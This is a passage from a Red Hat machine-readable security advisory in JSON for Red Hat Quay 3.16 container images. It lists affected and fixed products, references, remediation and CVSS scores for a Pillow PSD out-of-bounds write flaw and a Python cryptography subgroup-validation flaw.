"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
